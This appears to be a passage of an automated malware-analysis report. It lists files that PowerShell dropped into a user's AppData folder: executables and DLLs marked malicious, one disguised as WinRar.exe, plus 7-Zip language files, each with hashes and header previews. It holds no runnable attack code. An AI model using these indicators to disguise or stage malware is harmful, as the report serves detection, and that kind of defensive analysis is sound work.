                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........F.V.'...'...'...G...'...G..o'...G...'..=E...'..=E...'..=E...'..vy...'..vy...'...G...'...G...'...'..+'..FD...'..FD,..'...'D..'..FD...'..Rich.'..................PE..L...-.@\..........................................@.................................. ....@..........................................@..P^..............8?.......:.....p...........................`...@............................................text............................... ..`.rdata..............................@..@.data...XA..........................@....rsrc...P^...@...`..................@..@.reloc...:.......<...F..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelper

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):373656
                                                                                                                                                          Entropy (8bit):5.747099794440249
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:rbT9vTZFNSlIbVf7o3Cyi7igb/Js0S6uZZspiDbZHNjWOnNxFiKey1ISQlXflY:fRvNvvbhOq7F3S/qpiDlNCONvmXdY
                                                                                                                                                          MD5:14934CACA84D5FE0288F27EFB31DCBF8
                                                                                                                                                          SHA1:98C8C659488A5782679112E0FFB089422A664AC5
                                                                                                                                                          SHA-256:7FA86147035627BAE39576BCBE619D045E94A48C4DB8CA131968C20BB4DE4A36
                                                                                                                                                          SHA-512:9A239132A46FE578FA04FF727D8C28F9E1D179E7154619670A22A403819F337AF0A96EBD7081D04D53910A12BBDC548B3CD2B2A285931C92F1C149AD5D846A6A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................".....".......Q....R....D....C....T.......r...M....S....V....Rich............................PE..L.....b`.....................t....................@..................................X....@.................................${..|...................`...S...P...)...................................=..@...............P............................text...$........................... ..`.rdata.............................@..@.data...............................@....rsrc..............................@..@.reloc..nD...P...F..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQLiteShell.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):57443
                                                                                                                                                          Entropy (8bit):4.727941689161333
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:YEGJ9blT7XZBSbHwJU+tGR0KZUyGKZ0ZgwmF1+3UVambg:YEGJ9bln5o0KZjGKZ0Z1mF1+3UVayg
                                                                                                                                                          MD5:05E61539B8917FCA37C03756BBDD043D
                                                                                                                                                          SHA1:5A72E0E528260DE0EA5B34BADB9E5F9873CB4245
                                                                                                                                                          SHA-256:515C8E0B93F0FEF15DA3E2573AD92B7E7840374140E65E5D73DF63D8E22CB3E8
                                                                                                                                                          SHA-512:565D57783E6044D6E7E2026C79DBD897E637C5E1D96E7930DC704EF2B6D801669B38F0C26382F00E67E26668439274941E937A0ADE54666DE50B5D84F6DA7E97
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........QI..0'.0'.0'..,+.0'....0'.K.;.0'.k.>.0'..,).0'../,.0'../-.0'../#.0'...,.0'...#.0'.0&.80'..,.0'..-.0'.V6!.0'.n.#.0'.Rich.0'.........................PE..L...+..>...........!.....`...........L.......p.......................................................................................................................r...............................................p...............................text...zB.......P.................. ..`.orpc...Y....`.......`.............. ..`.rdata..))...p...0...p..............@..@.data...............................@....rsrc............ ..................@..@.reloc..z...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQRT.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32847
                                                                                                                                                          Entropy (8bit):6.251658580310083
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:+qtTeds1tkMAp4TxCW9su5UcSu93ggoXUQQIPGEANHl:FTedukelF95RjQUUPpANHl
                                                                                                                                                          MD5:1AEDCB8994D6AD63EF9DCB87016E028F
                                                                                                                                                          SHA1:F5B891AA15C6353B681BDB7E2D96C6AC8A5F02D7
                                                                                                                                                          SHA-256:53E1F40144BAB532F9700FF25EC3D5C6A39784A98E17FADA583B4EE6D9DD5DBC
                                                                                                                                                          SHA-512:89C0F408797C4D78AFC52335A9E162345C614E1E419F55487CB358C14F7A69EC82138A7E6250BE3133233386BA3659D241E80AB63C9B972B6C8B26B0424CB0C8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.\.s...}...v...}...w...}...y...}.%.d...}...|...}...w...}...v...}. .y...}.Rich..}.........................PE..L...lA.>...........!.....F...8.......S.......`....8!................................................................ l.......h..<....................................`...............................................`...............................text....E.......F.................. ..`.rdata..N*...`...,...J..............@..@.data... ............v..............@....reloc..\............z..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteRes.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):752738
                                                                                                                                                          Entropy (8bit):6.01898968608624
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:x9Ej/jb82/HRoXO1q2pt+Mc1/PDPicsUzM+gYESoE/wOuET8F62bH5vnGfcJvl+b:fqptG/PDPo0no2Iq8F6CHBTWqU
                                                                                                                                                          MD5:88962410244BC5C03482B82A7E3CB5E1
                                                                                                                                                          SHA1:4622BE2D3DEDA305BF0A16C0E01BC2ECF9D56FAD
                                                                                                                                                          SHA-256:AFA884228AFC5C05F4B47E90B6DE42854D5A8886EC5ED15A253FAECCD5309036
                                                                                                                                                          SHA-512:C6E7667F91C1439E33AD4D9E2052B7C9FCC3CA2C7688D9E2BC0550B71A5762B76AA76427331DF0217429D9BD984925997C7A8D009F25E44E2776C5CE7CC9D98C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yw..............r.......r.......d7..............d7.......5...............6......Rich....................PE..L......?...........!.........v......=........ ....X$.................................................................!..4...L ..<....@...n......................L...0 ............................................... ..,............................text............................... ..`.rdata..4.... ......................@..@.data...L....0......................@....rsrc....n...@...p..................@..@.reloc...............z..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):49251
                                                                                                                                                          Entropy (8bit):6.081875364524709
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:FPGeoWyuTx6vrP/zAdWQS6Z9CSKh64crVKTl9inMUAK:tGeJxIHepSKzjVK9iMUAK
                                                                                                                                                          MD5:059D94E8944ECA4056E92D60F7044F14
                                                                                                                                                          SHA1:46A491ABBBB434B6A1A2A1B1A793D24ACD1D6C4B
                                                                                                                                                          SHA-256:9FA7CACB5730FAACC2B17D735C45EE1370130D863C3366D08EC013AFE648BFA6
                                                                                                                                                          SHA-512:0F45FE8D5E80A8FABF9A1FD2A3F69B2C4EBB19F5FFDCFEC6D17670F5577D5855378023A91988E0855C4BD85C9B2CC80375C3A0ACB1D7A701AFF32E9E78347902
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......//..kNn.kNn.kNn..Rb.jNn.5le.hNn.XlK.iNn.mr.jNn..mw.eNn..Qd.oNn..Qj.iNn..R`.hNn..Qe.iNn..oe.iNn..oj.hNn.kNo.Nn.mme.yNn.Hh.jNn..nj.hNn.RichkNn.........................PE..L....B.>...........!.....n...P.......a.................................................................................................`.......................n...`...................................................T............................text....m.......n.................. ..`.rdata...2.......4...r..............@..@.data...............................@....rsrc...`...........................@..@.reloc..j...........................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\WinRar.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3312264
                                                                                                                                                          Entropy (8bit):7.95615688063186
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:lJXOBfK92HbAw0CNB3kJElzNsy8vGUvfCo3ABH43:lJ192HbAXCvDlzNsy8vGUyo3AB8
                                                                                                                                                          MD5:B66DEC691784F00061BC43E62030C343
                                                                                                                                                          SHA1:779D947D41EFAFC2995878E56E213411DE8FB4CF
                                                                                                                                                          SHA-256:26B40C79356453C60498772423F99384A3D24DD2D0662D215506768CB9C58370
                                                                                                                                                          SHA-512:6A89BD581BAF372F07E76A3378E6F6EB29CAC2E4981A7F0AFFB4101153407CADFCE9F1B6B28D5A003F7D4039577029B2EC6EBCFD58E55288E056614FB03F8BA3
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&(..bI..bI..bI....q.dI....s..I....r.oI....G.cI..Y...jI..Y...qI..Y...II..k1..kI..k1..cI..k1..gI..bI..rH......RI......cI......cI......cI..RichbI..........PE..d.....r\..........".................d%.........@.............................0......rh3...`..........................................!..4...$"..<........a...p..|&...J2..?... ..........T...........................`f...............@...............................text....,.......................... ..`.rdata..`....@.......2..............@..@.data...$"...@.......&..............@....pdata..|&...p...(...6..............@..@.gfids...............^..............@..@.rsrc....p.......b...`..............@..@.reloc....... ......................@..B................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\an.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7885
                                                                                                                                                          Entropy (8bit):4.947119682698004
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ifEAGRBQ0p/74r5jMdDTSBXgDQ7V8vBOC:iV5o74r5jMdY8l
                                                                                                                                                          MD5:BF8564B2DAD5D2506887F87AEE169A0A
                                                                                                                                                          SHA1:E2D6B4CF90B90E7E1C779DD16CBEF4C787CBD7CF
                                                                                                                                                          SHA-256:0E8DD119DFA6C6C1B3ACA993715092CDF1560947871092876D309DBC1940A14A
                                                                                                                                                          SHA-512:D3924C9397DC998577DD8CB18CC3EA37360257D4F62DD0C1D25B4D4BF817E229768E351D7BE0831C53C6C9C56593546E21FD044CF7988E762FB0A04CD2D4EC81
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Feliciano Mart.nez Tur..; 9.07 : Juan Pablo Mart.nez..;..;..;..;..;..;..;..;..;..0..7-Zip..Aragonese..Aragon.s..401..Acceptar..Cancelar........&S...&No..&Zarrar..Aduya....&Continar..440..S. a &tot..No a t&ot..Aturar..Tornar a empecipiar..Se&gundo plano..P&rimer plano..&Pausa..Aturau..Yes seguro que quiers cancelar?..500..&Fichero..&Editar..&Veyer..&Favoritos..&Ferramientas..Ad&uya..540..&Ubrir..Ubrir &adintro..Ubrir &difuera..&Veyer..&Editar..Re&nombrar..&Copiar en.....&Mover ta.....&Borrar..Di&vidir o fichero.....C&ombinar os fichers.....&Propiedatz..Comen&tario..Calcular a suma de comprebaci.n..Diff..Creyar carpeta..Creyar fichero..&Salir..600..Seleccionar-lo &tot..Deseleccionar-lo tot..&Invertir selecci.n..Seleccionar.....Deseleccionar.....Seleccionar por tipo..Deseleccionar por tipo..700..Iconos g&rans..&Iconos chicotz..&Lista..&Detalles..730..Desordenau..Anvista plana..&2 panels..&Barras de ferramientas..Ubrir a carpeta radiz..Carpeta mai..Hi

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ar.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12798
                                                                                                                                                          Entropy (8bit):4.3504468224966635
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:7+CIwRJQh3hY4+6TRxAFqpdQbCs7ZpN4QyRl3fcxMZXj4V/2QT:LJi3K4+60Fqpd8Cs7ZpNryRl3fcxMZX6
                                                                                                                                                          MD5:1C45E6A6ECB3B71A7316C466B6A77C1C
                                                                                                                                                          SHA1:04BF837911FA31FFCA8E034158714B47F6489D38
                                                                                                                                                          SHA-256:972261B53289DE2BD8A65E787A6E7CD6DEFC2B5F7E344128F2FE0492ED30CCF1
                                                                                                                                                          SHA-512:5358BB2346C9F23318492B5E7D208E37A703C70D62014426EADD2DD8CDA0B91C9D9C2A62EAFE0137FAEFB38BF727FD4D5D8DC18394784CCAE75AE9550558E193
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 9.07 :............:... ..-.... ....... ..; 9.07 : Awadh A Al-Ghaamdi..;..; 15.00 : 2016-08-28 : ..... ...... .......: ... .... ........; 15.00 : 2016-08-28 : Saif H Al-asadi (edited and corrected) ..; 20.00 : 2020-04-01 : Ammar Kurd (Edits and corrections)..;..;..;..;..;..0..7-Zip..Arabic........401.............. .............&.....&....&...................&.........440..... ........ .................. ..........&...........&......&..... ........... .......... ... ..... .. ..........500..&.....&.......&.........&.......&.......&........540..&.....&.... ..........&... ........&.....&..........&.. ............&.. ........&.. .....&.....&..... ............&. ..............

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\az.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9625
                                                                                                                                                          Entropy (8bit):5.375676523076257
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iQMqAQbtI+SY+oEDQM0ia9mh/Vg/HksiM0ko3gvje2ojVPC1vUZzxEBa2U:i7SrSYzEsMDV4P0kggv6pCahxEwr
                                                                                                                                                          MD5:81B732A8B4206FB747BFBFE524DDE192
                                                                                                                                                          SHA1:4D596B597CF25FF8D8B43708E148DB188AF18EF9
                                                                                                                                                          SHA-256:CAEC460E73BD0403C2BCDE7E773459BEA9112D1BFACBE413D4F21E51A5762BA6
                                                                                                                                                          SHA-512:8667BFF18A26FE5B892ECFDC8D9C78ECC5659B42C482E1F9E6EB09F7CF5E825584851CD4E9A00F5C62D3096D24CC9664F8223C036A4F2F6E9C568269B2FBB956
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : F@rhad..; 15.02 : 2015-03-29 : .. .........; ..;..;..;..;..;..;..;..;..0..7-Zip..Azerbaijani..Az.rbaycanca..401..OLDU...mtina........&B.li..&Xeyr..&Ba.lamaq..K.m.k....&Davam..440..&Ham.s.na B.li..Ha&m.s.na Xeyr..Dayan..Yenid.n ba.lamaq..&Arxa planda...&nd...F&asil...Fasil.d...H.qiq.t.n .m.liyyat. dayand.rmaq ist.yirsiniz?..500..&Fayl..&D.z.li...&G.r.n....S&e.ilmi.l.r..&Vasit.l.r..&Aray....540..&A.maq..&Daxild. A.maq..B&ay.rda a.maq..&Bax....&D.z.li...Ye&nid.n Adland.rmaq..&N.sx.l.m.k.....&K...rm.k.....&Silm.k..Fayl. &B.lm.k.....Fayllar. B&irl..dirm.k.....X&.susiyy.tl.r....r&h.....Yoxlama C.mi..M.qayis...Qovluq Yaratmaq..Fayl Yaratmaq...&.x.....stinad..&.v.zedici Ax.nlar..600..&Ham.s.n. Se.m.k..Se.imin L..vi..&Se.imi .evirm.k..Se.m.k.....Se.imin L..vi.....N.v.n. G.r. Se.m.k..N.v.n. G.r. Se.imin L..vi..700..&B.y.k ..ar.l.r..K&i.ik

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ba.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11261
                                                                                                                                                          Entropy (8bit):4.710389021145071
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ikNx8wxsv75EMVB1m6pP3z/WxdxbpXuBwBMzByzVHQnlBJ7a/NMIMx:ikLhsv75EMVB1m6pP3dzk5ww/NMIq
                                                                                                                                                          MD5:D83B65AC086DA0C94D6EB57BEE669C2B
                                                                                                                                                          SHA1:6210F62D41D44CC280F44B39ACCF10DA28424B75
                                                                                                                                                          SHA-256:2901B54F7621C95429658CB4EDB28ABD0CB5B6E257C7D9A364FC468A8B86BAAE
                                                                                                                                                          SHA-512:56C7ECB4223103D81FFD11C214CCEAC20E7770B82FBC78A5E82E6DD9D589CC319D4689BB6D9027E5D272097E1B33DDBA27A8414FCBC29F9EF68329E343004222
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.20 : Haqmar : www.bashqort.com..; ..;..;..;..;..;..;..;..;..;..0..7-Zip..Bashkir.............401............. ..........&.....&....&.............&.......440.......... .. .&......&...... .. ................. .......&..... .........&... ........&........ ................. .... ....... .. ...... ............?..500..&........&......&..........&............&........&.........540..&........&...... ........&..... ..........&.....&...............&...... .............&.................&............&.............. &............... ...&................&..........&................. ......Diff..... ............. &..........&.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\be.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12193
                                                                                                                                                          Entropy (8bit):4.4720152705808935
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i2PDEeaNB1PmcptkcDHxbTvPnc67bMxQxGx4ch/JuLQRcg/oN96bPNljYiYr197:ikDFKBFmcPLx3HPnIsqrJuqcgAN96b87
                                                                                                                                                          MD5:3C21135144AC7452E7DB66F0214F9D68
                                                                                                                                                          SHA1:B1EC0589D769EAB5E4E8F0F8C21B157EF5EBB47D
                                                                                                                                                          SHA-256:D095879B8BBC67A1C9875C5E9896942BACF730BD76155C06105544408068C59E
                                                                                                                                                          SHA-512:0446A0E2570A1F360FD8700FD4C869C7E2DBB9476BBDEC2526A53844074C79691542B91455343C50941B8A6D5E02A58EE6AA539CC4C4AE9CF000B4034EF663E2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Kirill Gulyakevitch..; 9.07 : 2011-03-15 : Drive DRKA..;..;..;..;..;..;..;..;..;..0..7-Zip..Belarusian..............401..OK................&.....&....&......................&............440..... ... &........ ... .&.......................&.......&.. ....... ......&......... ......... ........ ....... .......... ........?..500..&......&........&........&..........&.......&.........540..&................ &................... .&................&................&.........&......... ......&........... ......&............&..... ..........&.'...... .............&...........&................. ......Diff..&........ .

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\bg.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13231
                                                                                                                                                          Entropy (8bit):4.264061628389684
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:i6jWFsfLEnlztmkbjX8jD5VqWMTlHdr8vwyFSH:tfghGufHdrLyFA
                                                                                                                                                          MD5:833AFB4F88FDB5F48245C9B65577DC19
                                                                                                                                                          SHA1:1A6E013226BE42CD2D2872B1E6E5747FAB65FE8A
                                                                                                                                                          SHA-256:4DCABCC8AB8069DB79143E4C62B6B76D2CF42666A09389EACFC35074B61779E3
                                                                                                                                                          SHA-512:05BBC7ABCFD0A0B7C3305C860B6372871CF3927BBE1790351485A315166E4CBDF8D38D63E01B677BDBA251CE52DA655F20B2D44B997D116A1794C7B3EB61EF31
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : chavv..; : icobgr..; 4.65 : Vassia Atanassova..;..;..;..;..;..;..;..;..0..7-Zip..Bulgarian.............401..OK...............&....&....&......................&............440.... .. &.......... .. &................ ........&..... .......&........ .......&........ ............... .. ....... .. ..........?..500..&......&.............&...........&........&.............&.......540..&.................. &........... &.......&...........&.................&..........&........ .........&........ ........&..........&........ .. ..........&.......... .. ............&.............&.................. .. ......... ..

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\bn.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15062
                                                                                                                                                          Entropy (8bit):4.039346182307332
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iM+g4O23sZEstg+lTr++0Mx148IiZaXTXEU10bXYc+4/rexX4:iMyc2stg+lTr++0MQ8DZRDYc+4axI
                                                                                                                                                          MD5:D0E788F64268D15B4391F052B1F4B18A
                                                                                                                                                          SHA1:2FD8E0A9DD22A729D578536D560354C944C7C93E
                                                                                                                                                          SHA-256:216CC780E371DC318C8B15B84DE8A5EC0E28F712B3109A991C8A09CDDAA2A81A
                                                                                                                                                          SHA-512:D50EA673018472C17DB44B315F4C343A2924A2EAA95C668D1160AA3830533CA37CC13C2067911A0756F1BE8C41DF45669ABE083759DCB9436F98E90CBB6AC8BF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.46 : Team Oruddho (Fahad Mohammad Shaon, Mahmud Hassan) : http://www.oruddho.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Bangla.........401..... ..................&.......&....&.... ................&...... .......440..&....... .... ........&...... .... .............. ......&........& .......&.............. ............... ..... .... ......?..500..&......&..................&..&.......&........&........540..&........ .....7-zip-. ........ ........... ........ .....&..........&............. ...

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ca.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9375
                                                                                                                                                          Entropy (8bit):5.027798509110858
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iDNC5+TqX1VvwqqNZ3SE/ye3TmsZmpk0R6PeNJH+L/w3M0ZeDwDWBszBUe:iBhuX1OqqNZ39BDmfHB4yXBUe
                                                                                                                                                          MD5:1657720023A267B5B625DE17BF292299
                                                                                                                                                          SHA1:0045DFAFAFB9C9058F7D0D6A6C382959C5A67FE0
                                                                                                                                                          SHA-256:ED8748DA8FA99DB775FF621D3E801E2830E6C04DA42C0B701095580191A700A6
                                                                                                                                                          SHA-512:E7998F6484370E53DB9CDC80CD55070E408AA93161FA59E48C6E2B26462D6D3EB774C011212840EF1EB821A5BA067B6706CD4CA2BE00619AECD24A11E6CA136F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Josep Casals, Marc Folch..;.17.01.: Benet..BennyBeat..R..i.Camps..;..;..;..;..;..;..;..;..;..0..7-Zip..Catalan..Catal...401..D'acord..Cancel.la........&S...&No..Tan&ca..Ajuda....&Continua..440..S. a &tot..No a t&ot..Atura..Re&inicia..Rere&fons..Prim&er pla..&Pausa..Pausat..Segur que voleu cancel.lar?..500..&Fitxer..&Edita..&Visualitza..&Preferits..E&ines..Aj&uda..540..&Obre..Obre d&ins..Obre &fora..&Visualitza..&Edita..Reanom&ena..&Copia a.....&Mou a.....&Suprimeix..&Divideix el fitxer.....Com&bina el fitxer.....P&ropietats..Come&ntari..Calcula la suma de verificaci...Compara..Crea una carpeta..Crea un fitxer..S&urt..Enlla&...Flux &alternatiu..600..Seleccion&a-ho tot..No seleccionis res..&Inverteix la selecci...Selecciona.....Desselecciona.....Selecciona per tipus..Desselecciona per tipus..700..Icones g&rans..Icones petites..&Llista..&Detalls..730..No ordenat..Vista plana..&2 Panells..&Barres d'eines..Obre la carpeta arrel..Carpeta pare..H

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\co.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10695
                                                                                                                                                          Entropy (8bit):5.020353007635267
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ihVHn4OzB1duTbLH7v6Hosnk8dazlVDFdYojN4/5rA3AOEY9yt0zKdAVJg:ihtnjJuHLH76Hosk8daZV7FjN4RrA3FG
                                                                                                                                                          MD5:C76B8C615C11469D5F6DFF0ABF39171E
                                                                                                                                                          SHA1:1906CD1CE4712D79D129FCF32FD2FF87368081EA
                                                                                                                                                          SHA-256:5470B36A4A715DECA06035333A01E0A2899FCE1CF6C29A6ECE4C35CFCC843CFD
                                                                                                                                                          SHA-512:C4920988538810B9501C6790A2ED4D4E82500134244B8AE1371F3025BFFBC7E6CC73FE1A9839AA2A0D020F2B9CBF0FD09EC99354CB2A65C3D08AF519BDE38384
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.02.: 2020-12-04.: Patriccollu di Santa Maria . Sich. (Latest Update)..; 9.20.: 2010-12-12.: Patriccollu di Santa Maria . Sich. (Creation)..;..;..;..;..;..;..;..;..;..0..7-Zip..Corsican..Corsu..401..Vai..Abbandun.........&I...I&nn...&Chjode..Aiutu....&Cuntinu...440..I. per &tutti..Inn. per t&utti..Piant...Rilanci...Tacca di &fondu..In &primu pianu..&Pausa..In pausa..Site sicuru di vul. annull..?..500..&Schedariu..&Mudificazione..&Affissera..&Favuriti..A&ttrezzi..Ai&utu..540..&Apre..Apre den&tru..Apre f&ora..&Fighj...&Mudific...&Rinumin...&Cupi. ver di...&Dispiazz. ver di...S&quass...&Sparte u schedariu...&Unisce i schedarii...&Prupriet...Cumme&ntu...Calcul. a somma di cuntrollu..Paragun. e sfarenze..Cre. un cartulare..Cre. un schedariu..&Esce..Liame..Flussi a&lternativi..600..&Tuttu selezziun....n selezziun. &nunda..&Arritrus. a selezzione..&Selezziun.....n &micca selezziun....Selezziun. da u tipu...n selez

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\cs.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9204
                                                                                                                                                          Entropy (8bit):5.371514089173945
                                                                                                                                                          Encrypted:false
